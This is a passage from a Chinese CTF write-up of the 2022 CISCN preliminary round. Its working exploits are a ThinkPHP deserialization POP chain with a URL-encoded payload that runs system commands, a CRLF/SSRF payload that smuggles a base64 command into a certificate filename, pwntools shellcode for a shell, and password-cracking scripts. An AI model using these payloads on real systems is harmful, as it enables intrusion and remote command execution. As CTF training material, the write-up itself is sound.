class="line"> hdrsz = 104</span><br><span class="line"></span><br><span class="line"> hdr = None</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> while True:</span><br><span class="line"></span><br><span class="line"> off = f.tell()</span><br><span class="line"></span><br><span class="line"> buf = f.read(hdrsz)</span><br><span class="line"></span><br><span class="line"> if len(buf) < hdrsz: break</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> if is_magic(buf):</span><br><span class="line"></span><br><span class="line"> hdr = decode_data_normal(buf)</span><br><span class="line"></span><br><span class="line"> logger.info('found DeepSound header at offset %i', off)</span><br><span class="line"></span><br><span class="line"> break</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> f.seek(-hdrsz + 1, os.SEEK_CUR)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> if hdr is None:</span><br><span class="line"></span><br><span class="line"> logger.warn('does not appear to be a DeepSound file')</span><br><span class="line"></span><br><span class="line"> return</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"># Check some header fields</span><br><span class="line"></span><br><span class="line"> mode = hdr[4]</span><br><span class="line"></span><br><span class="line"> encrypted = hdr[5]</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> modes = {2: 'low', 4: 'normal', 8: 'high'}</span><br><span class="line"></span><br><span class="line"> if mode in modes:</span><br><span class="line"></span><br><span class="line"> logger.info('data is encoded in %s-quality mode', modes[mode])</span><br><span class="line"></span><br><span class="line"> else:</span><br><span class="line"></span><br><span class="line"> logger.error('unexpected data encoding mode %i', modes[mode])</span><br><span class="line"></span><br><span class="line"> return</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> if encrypted == 0:</span><br><span class="line"></span><br><span class="line"> logger.warn('file is not encrypted')</span><br><span class="line"></span><br><span class="line"> return</span><br><span class="line"></span><br><span class="line"> elif encrypted != 1:</span><br><span class="line"></span><br><span class="line"> logger.error('unexpected encryption flag %i', encrypted)</span><br><span class="line"></span><br><span class="line"> return</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> sha1 = hdr[6:6+20]</span><br><span class="line"></span><br><span class="line"> print('%s:$dynamic_1529$%s' % (bname, sha1.hex()))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == '__main__':</span><br><span class="line"></span><br><span class="line"> import argparse</span><br><span class="line"></span><br><span class="line"> parser = argparse.ArgumentParser()</span><br><span class="line"></span><br><span class="line"> parser.add_argument('--verbose', '-v', action='store_true')</span><br><span class="line"></span><br><span class="line"> parser.add_argument('files', nargs='+', metavar='file',</span><br><span class="line"></span><br><span class="line"> type=argparse.FileType('rb', bufsize=4096))</span><br><span class="line"></span><br><span class="line"> args = parser.parse_args()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> if args.verbose:</span><br><span class="line"></span><br><span class="line"> logging.basicConfig(level=logging.INFO)</span><br><span class="line"></span><br><span class="line"> else:</span><br><span class="line"></span><br><span class="line"> logging.basicConfig(level=logging.WARN)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> convert_warn = False</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> for f in args.files:</span><br><span class="line"></span><br><span class="line"> process_deepsound_file(f)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> if convert_warn:</span><br><span class="line"></span><br><span class="line"> print(textwrap.dedent('''</span><br><span class="line"></span><br><span class="line"> ---------------------------------------------------------------</span><br><span class="line"></span><br><span class="line"> Some files were not in .wav format. Try converting them to .wav</span><br><span class="line"></span><br><span class="line"> and try again. You can use: ffmpeg -i input output.wav</span><br><span class="line"></span><br><span class="line"> ---------------------------------------------------------------</span><br><span class="line"></span><br><span class="line"> '''.rstrip()), file=sys.stderr)</span><br></pre></td></tr></table></figure><p>先使用脚本获取一 hash 再用 john 爆破就好了</p><p><img src="https://img-blog.csdnimg.cn/img_convert/2e013892de80d5b1709014b4b876ab67.gif" alt="图片"></p><p>得到密码是 feedback</p><p><img src="https://img-blog.csdnimg.cn/img_convert/f3bce5aad5fdc50397272e340d8ae3c1.gif" alt="图片"></p><p>得到 key.txt</p><p><img src="https://img-blog.csdnimg.cn/img_convert/81cc27a1fef1cb100d64e0f3ada660e8.gif" alt="图片"></p><p>这个时候拿到 key 肯定是要解密什么东西,思考一下现在可以利用的东西,音频已经解完了,可能是 vmdk 还有什么东西没有发现,然后使用 FTK 挂载一下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/b49cbd2de5c39cffeef092f9cca3379c.gif" alt="图片"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/2afd8db44e244dd055b462913087339b.gif" alt="图片"></p><p><img src="/2023/12/05/2022%20CISCN%20%E5%88%9B%E6%96%B0%E8%83%BD%E5%8A%9B%E5%AE%9E%E8%B7%B5%E8%B5%9B%E5%88%9D%E8%B5%9BWP/" alt="图片"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/18f43970ae7a5e66986c30d0d8912222.gif" alt="图片"></p><p>在回收站发现了两个文件,导出看一下,结合刚刚拿到的密码想到可以用 veracrypt 或者是 Truecrypt (具体名字忘了),经过尝试可以用 vera 挂载,$RDWTTK4 这个文件可以成功挂载</p><p><img src="https://img-blog.csdnimg.cn/img_convert/99537e5484aff08c286455446cbdc9e2.gif" alt="图片"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/825e926e1f7afd7d5e6f1d9f0d0b8e8b.gif" alt="图片"></p><p>spiral 是一个 zip,然后发现里面的数据很乱</p><p>下面是复现部分。</p><p>搜索一下<code>spiral</code></p><p><img src="https://img-blog.csdnimg.cn/img_convert/44bd78107d1e1e51234747a68d074593.gif" alt="图片"></p><p><a href="https://blog.csdn.net/GW_wg/article/details/120406192">https://blog.csdn.net/GW_wg/article/details/120406192</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">def function(n):</span><br><span class="line"></span><br><span class="line"> matrix = [[0] * n for _ in range(n)]</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> number = 1</span><br><span class="line"></span><br><span class="line"> left, right, up, down = 0, n - 1, 0, n - 1</span><br><span class="line"></span><br><span class="line"> while left < right and up < down:</span><br><span class="line"></span><br><span class="line"> # 从左到右</span><br><span class="line"></span><br><span class="line"> for i in range(left, right):</span><br><span class="line"></span><br><span class="line"> matrix[up][i] = number</span><br><span class="line"></span><br><span class="line"> number += 1</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> # 从上到下</span><br><span class="line"></span><br><span class="line"> for i in range(up, down):</span><br><span class="line"></span><br><span class="line"> matrix[i][right] = number</span><br><span class="line"></span><br><span class="line"> number += 1</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> # 从右向左</span><br><span class="line"></span><br><span class="line"> for i in range(right, left, -1):</span><br><span class="line"></span><br><span class="line"> matrix[down][i] = number</span><br><span class="line"></span><br><span class="line"> number += 1</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> for i in range(down, up, -1):</span><br><span class="line"></span><br><span class="line"> matrix[i][left] = number</span><br><span class="line"></span><br><span class="line"> number += 1</span><br><span class="line"></span><br><span class="line"> left += 1</span><br><span class="line"></span><br><span class="line"> right -= 1</span><br><span class="line"></span><br><span class="line"> up += 1</span><br><span class="line"></span><br><span class="line"> down -= 1</span><br><span class="line"></span><br><span class="line"> # n 为奇数的时候,正方形中间会有个单独的空格需要单独填充</span><br><span class="line"></span><br><span class="line"> if n % 2 != 0:</span><br><span class="line"></span><br><span class="line"> matrix[n // 2][n // 2] = number</span><br><span class="line"></span><br><span class="line"> return matrix</span><br></pre></td></tr></table></figure><h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h1><h2 id="Ezpop"><a href="#Ezpop" class="headerlink" title="Ezpop"></a>Ezpop</h2><p>扫目录发现 <a href="https://www.zip/">www.zip</a>,下载源码进行审计,结合题目提示发现是 tp 的旧有漏洞,去找网上的利用链</p><p><img src="/2023/12/05/2022%20CISCN%20%E5%88%9B%E6%96%B0%E8%83%BD%E5%8A%9B%E5%AE%9E%E8%B7%B5%E8%B5%9B%E5%88%9D%E8%B5%9BWP/" alt="图片"></p><p>poc</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line"></span><br><span class="line">namespace think\model\concern;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">trait Attribute</span><br><span class="line"></span><br><span class="line">{</span><br><span class="line"></span><br><span class="line"> private $data = ["key" => ["key1" => "cat /f*"]];</span><br><span class="line"></span><br><span class="line"> private $withAttr = ["key"=>["key1"=>"system"]];</span><br><span class="line"></span><br><span class="line"> protected $json = ["key"];</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">trait ModelEvent{</span><br><span class="line"></span><br><span class="line"> protected $withEvent;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">namespace think;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">abstract class Model{</span><br><span class="line"></span><br><span class="line"> use model\concern\Attribute;</span><br><span class="line"></span><br><span class="line"> use model\concern\ModelEvent;</span><br><span class="line"></span><br><span class="line"> private $exists;</span><br><span class="line"></span><br><span class="line"> private $force;</span><br><span class="line"></span><br><span class="line"> private $lazySave;</span><br><span class="line"></span><br><span class="line"> protected $suffix;</span><br><span class="line"></span><br><span class="line"> function __construct($a = '')</span><br><span class="line"></span><br><span class="line"> {</span><br><span class="line"></span><br><span class="line"> $this->exists = true;</span><br><span class="line"></span><br><span class="line"> $this->force = true;</span><br><span class="line"></span><br><span class="line"> $this->lazySave = true;</span><br><span class="line"></span><br><span class="line"> $this->withEvent = false;</span><br><span class="line"></span><br><span class="line"> $this->suffix = $a;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">namespace think\model;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">use think\Model;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">class Pivot extends Model{}</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">echo urlencode(serialize(new Pivot(new Pivot())));</span><br><span class="line"></span><br><span class="line">?></span><br></pre></td></tr></table></figure><p>生成 poc</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A24%3A%22cat+..%2F..%2F..%2F..%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A24%3A%22cat+..%2F..%2F..%2F..%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D</span><br></pre></td></tr></table></figure><p>访问路由 <code>index.php/index/test</code></p><p><img src="https://img-blog.csdnimg.cn/img_convert/7fdb2ca6dff02b2f281ab3519e6e211e.gif" alt="图片"></p><h2 id="online-crt"><a href="#online-crt" class="headerlink" title="online_crt"></a>online_crt</h2><p>下载代码进行审计</p><p><img src="https://img-blog.csdnimg.cn/img_convert/bbdc99913b32a37f061b2a7a705b8f8c.gif" alt="图片"></p><p>app.py</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">@app.route('/getcrt', methods=['GET', 'POST'])</span><br><span class="line"></span><br><span class="line">def upload():</span><br><span class="line"></span><br><span class="line"> Country = request.form.get("Country", "CN")</span><br><span class="line"></span><br><span class="line"> Province = request.form.get("Province", "a")</span><br><span class="line"></span><br><span class="line"> City = request.form.get("City", "a")</span><br><span class="line"></span><br><span class="line"> OrganizationalName = request.form.get("OrganizationalName", "a")</span><br><span class="line"></span><br><span class="line"> CommonName = request.form.get("CommonName", "a")</span><br><span class="line"></span><br><span class="line"> EmailAddress = request.form.get("EmailAddress", "a")</span><br><span class="line"></span><br><span class="line"> return get_crt(Country, Province, City, OrganizationalName, CommonName, EmailAddress)</span><br></pre></td></tr></table></figure><p>生成 crt 证书</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">@app.route('/createlink', methods=['GET'])</span><br><span class="line"></span><br><span class="line">def info():</span><br><span class="line"></span><br><span class="line"> json_data = {"info": os.popen("c_rehash static/crt/ && ls static/crt/").read()}</span><br><span class="line"></span><br><span class="line"> return json.dumps(json_data)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">@app.route('/proxy', methods=['GET'])</span><br><span class="line"></span><br><span class="line">def proxy():</span><br><span class="line"></span><br><span class="line"> uri = request.form.get("uri", "/")</span><br><span class="line"></span><br><span class="line"> client = socket.socket()</span><br><span class="line"></span><br><span class="line"> client.connect(('localhost', 8887))</span><br><span class="line"></span><br><span class="line"> msg = f'''GET {uri} HTTP/1.1</span><br><span class="line"></span><br><span class="line">Host: test_api_host</span><br><span class="line"></span><br><span class="line">User-Agent: Guest</span><br><span class="line"></span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line"></span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line"></span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">'''</span><br><span class="line"></span><br><span class="line"> client.send(msg.encode())</span><br><span class="line"></span><br><span class="line"> data = client.recv(2048)</span><br><span class="line"></span><br><span class="line"> client.close()</span><br><span class="line"></span><br><span class="line"> return data.decode()</span><br><span class="line"></span><br><span class="line">可以访问内网 8887 端口的 go 服务</span><br><span class="line"></span><br><span class="line">func admin(c *gin.Context) {</span><br><span class="line"></span><br><span class="line"> staticPath := "/app/static/crt/"</span><br><span class="line"></span><br><span class="line"> oldname := c.DefaultQuery("oldname", "")</span><br><span class="line"></span><br><span class="line"> newname := c.DefaultQuery("newname", "")</span><br><span class="line"></span><br><span class="line"> if oldname == "" || newname == "" || strings.Contains(oldname, "..") || strings.Contains(newname, "..") {</span><br><span class="line"></span><br><span class="line"> c.String(500, "error")</span><br><span class="line"></span><br><span class="line"> return</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> if c.Request.URL.RawPath != "" && c.Request.Host == "admin" {</span><br><span class="line"></span><br><span class="line"> err := os.Rename(staticPath+oldname, staticPath+newname)</span><br><span class="line"></span><br><span class="line"> if err != nil {</span><br><span class="line"></span><br><span class="line"> return</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> c.String(200, newname)</span><br><span class="line"></span><br><span class="line"> return</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> c.String(200, "no")</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>可以看到 admin 函数替换名字,也就是说文件名称是可以控制的</p><p>也就是说题目重点也是我们可以操作的点就是:app.py 的 info 函数</p><blockquote><p>ls 进行列目录</p><p>c_rehash 扫描指定目录列表中的.pem,.crt,.cer及.crl文件并为这些文件计算hash值,并以计算出的hash值为名字为这些文件创建符号连接。(如果你的操作平台不支持符号连接,则执行的是一个拷贝。)这个功能像很多程序一样有用,对于使用OpenSSL要求建立的目录,其目的是找到证书。</p></blockquote><p>访问内网 go 服务需要使用 get 请求加上 post 下的参数,使用 clrf 发完整的 http 包</p><p>最终 payload</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uri=/admin/renam%25%36%35?oldname=6feee645-87d2-411f-bc5d-13501b3eae98.crt%26newname="||echo%25%32%30Y2F0IC9mbGFn|base64%25%32%30-d|sh||".crt%20HTTP/1.1%0aHost: admin%0aAa:%0a%0a</span><br></pre></td></tr></table></figure><p>首先访问 getcrt 生成 crt 文件,发包去替换 crt 文件名</p><p><img src="https://img-blog.csdnimg.cn/img_convert/5a337a2113289231676c0428672c87ce.gif" alt="图片"></p><p>然后 createlink 去执行命令看到 flag</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c7856571cf29e3688c8c85932346c33d.gif" alt="图片"></p><h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="login-nomal"><a href="#login-nomal" class="headerlink" title="login-nomal"></a>login-nomal</h2><p>通过菜单功能 1 获得 root 权限,通过功能 2mmap 一段可读可写可执行权限的地址,并且发现里面有对于输入内容是否为可视字符的 check,使用 alpha3 生成 shellcode 以后 getshell</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">p = process('./pwn')</span><br><span class="line"></span><br><span class="line">payload1 = "msg:ro0tt\nopt:1\n"</span><br><span class="line"></span><br><span class="line">p.sendline(payload1)</span><br><span class="line"></span><br><span class="line">sc = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070tt"</span><br><span class="line"></span><br><span class="line">payload2 = "msg:"+sc+"\nopt:2\n"</span><br><span class="line"></span><br><span class="line">p.sendline(payload2)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h1 id="CRY"><a href="#CRY" class="headerlink" title="CRY"></a>CRY</h1><h2 id="基于挑战码的双向认证1"><a href="#基于挑战码的双向认证1" class="headerlink" title="基于挑战码的双向认证1"></a>基于挑战码的双向认证1</h2><p><img src="https://img-blog.csdnimg.cn/img_convert/24eb3fc89e176203bf9ec8ffded01e7b.gif" alt="图片"></p><p>非预期</p><p>用户名密码均为player</p><p>cd /root/cube-shell/instance/flag_server</p><p>直接 catflag 即可</p><p><img src="https://img-blog.csdnimg.cn/img_convert/061efd0fac7d10b650eb0a021d074c3b.gif" alt="图片"></p><h2 id="基于挑战码的双向认证2"><a href="#基于挑战码的双向认证2" class="headerlink" title="基于挑战码的双向认证2"></a>基于挑战码的双向认证2</h2><p>非预期</p><p>cat flag2.txt</p><h2 id="基于挑战码的双向认证2-1"><a href="#基于挑战码的双向认证2-1" class="headerlink" title="基于挑战码的双向认证2"></a>基于挑战码的双向认证2</h2><p>非预期</p><p>弱密码</p><p>su root、toor 密码</p><h2 id="签到电台"><a href="#签到电台" class="headerlink" title="签到电台"></a>签到电台</h2><p>根据公众号给出的提示,得到了“弼时安全到达了”所对应的7个电码:</p><p>1732 2514 1344 0356 0451 6671 0055</p><p>知道是要从密码表截取前28位,每位相加然后模除以10,加不进位,减不借位</p><p>脚本:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">key = '6561607990115808526135662113'</span><br><span class="line"></span><br><span class="line">nums = '1732251413440356045166710055'</span><br><span class="line"></span><br><span class="line">for i in range(0,28):</span><br><span class="line"></span><br><span class="line"> print((int(key[i])+int(nums[i])) % 10,end="")</span><br><span class="line"></span><br><span class="line">#7293858303555154561291372168</span><br></pre></td></tr></table></figure><p>用url传参把结果传进去,就能拿到flag</p><p><img src="https://img-blog.csdnimg.cn/img_convert/40c4aa11655ed4a165cd7b1586f4082c.png" alt="图片"></p><h2 id="ISO9798"><a href="#ISO9798" class="headerlink" title="ISO9798"></a>ISO9798</h2><p>申请容器,用自己的服务器 nc 容器</p><p>根据提示爆破四位的字符串</p><p>脚本:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">from hashlib import sha256</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">s = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY0123456789'</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">for i in s:</span><br><span class="line"></span><br><span class="line"> for j in s:</span><br><span class="line"></span><br><span class="line"> for k in s:</span><br><span class="line"></span><br><span class="line"> for l in s:</span><br><span class="line"></span><br><span class="line"> string = i+j+k+l+'xBSIsJVew5i1em0k'</span><br><span class="line"></span><br><span class="line"> b = sha256(string.encode('utf-8')).hexdigest()</span><br><span class="line"></span><br><span class="line"> if (b == 'fd5cfd228da08b9b788e3c2290268eca55f98581c3c54e2c577dcb051de50071'):</span><br><span class="line"></span><br><span class="line"> print(string)</span><br></pre></td></tr></table></figure><p>输入个数字作为RB的值</p><p>根据题目提示参考ISO9798-2标准,对RA和RB做分割提取和拼接</p><p><a href="https://www.doc88.com/p-1496121116297.html">https://www.doc88.com/p-1496121116297.html</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">s = '0dc7b82d345c2cdfee36dc1c7d5a397a78e6af74fa2bd810be55dd3cefb1afe96f5a0acdd3a17922baaf31ea767d99e2'</span><br><span class="line"></span><br><span class="line">ra = s[0:32]</span><br><span class="line"></span><br><span class="line">rb = s[32:64]</span><br><span class="line"></span><br><span class="line">print(rb+ra)</span><br></pre></td></tr></table></figure><p>输入计算的值,得到flag</p><p><img src="https://img-blog.csdnimg.cn/img_convert/d717a424deb896a4ca97a7f1f83da1f8.png"></p>]]></content>
